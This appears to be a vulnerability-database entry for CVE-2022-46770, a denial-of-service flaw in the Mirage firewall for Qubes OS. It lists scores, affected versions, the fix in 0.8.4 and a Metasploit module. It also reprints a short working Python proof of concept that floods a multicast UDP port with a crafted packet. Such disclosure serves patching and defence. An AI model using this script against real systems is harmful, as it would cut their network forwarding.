CVE-2022-46770
published 2022-12-07CVE-2022-46770: qubes-mirage-firewall (aka Mirage firewall for QubesOS) 0.8.x through 0.8.3 allows guest OS users to cause a denial of service (CPU consumption and loss of…
PriorityP357high7.5CVSS 3.1
AVNACLPRNUINSUCNINAH
EXPLOIT
EPSS
21.48%
97.3th percentile
qubes-mirage-firewall (aka Mirage firewall for QubesOS) 0.8.x through 0.8.3 allows guest OS users to cause a denial of service (CPU consumption and loss of forwarding) via a crafted multicast UDP packet (IP address range of 224.0.0.0 through 239.255.255.255).
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linuxfoundation | mirage_firewall | >= 0.8.0 < 0.8.4 | 0.8.4 |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS)
exploitdb·2023-03-31·CVSS 7.5
CVE-2022-46770 [HIGH] qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS)
qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS)
---
# Exploit Title: qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS)
# Date: 2022-12-04
# Exploit Author: Krzysztof Burghardt
# Vendor Homepage: https://mirage.io/blog/MSA03
# Software Link: https://github.com/mirage/qubes-mirage-firewall/releases
# Version: >= 0.8.0 & < 0.8.4
# Tested on: Qubes OS
# CVE: CVE-2022-46770
#PoC exploit from https://github.com/mirage/qubes-mirage-firewall/issues/166
#!/usr/bin/env python3
from socket import socket, AF_INET, SOCK_DGRAM
TARGET = "239.255.255.250"
PORT = 5353
PAYLOAD = b'a' * 607
s = socket(AF_INET, SOCK_DGRAM)
s.sendto(PAYLOAD, (TARGET, PORT))
Metasploit
Mirage firewall for QubesOS 0.8.0-0.8.3 Denial of Service (DoS) Exploit
metasploit
Mirage firewall for QubesOS 0.8.0-0.8.3 Denial of Service (DoS) Exploit
Mirage firewall for QubesOS 0.8.0-0.8.3 Denial of Service (DoS) Exploit
This module allows remote attackers to cause a denial of service (DoS) in Mirage firewall for QubesOS 0.8.0-0.8.3 via a specifically crafted UDP request.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/171610/Qubes-Mirage-Firewall-0.8.3-Denial-Of-Service.htmlhttps://github.com/mirage/qubes-mirage-firewall/issues/166http://packetstormsecurity.com/files/171610/Qubes-Mirage-Firewall-0.8.3-Denial-Of-Service.htmlhttps://github.com/mirage/qubes-mirage-firewall/issues/166
2022-12-07
Published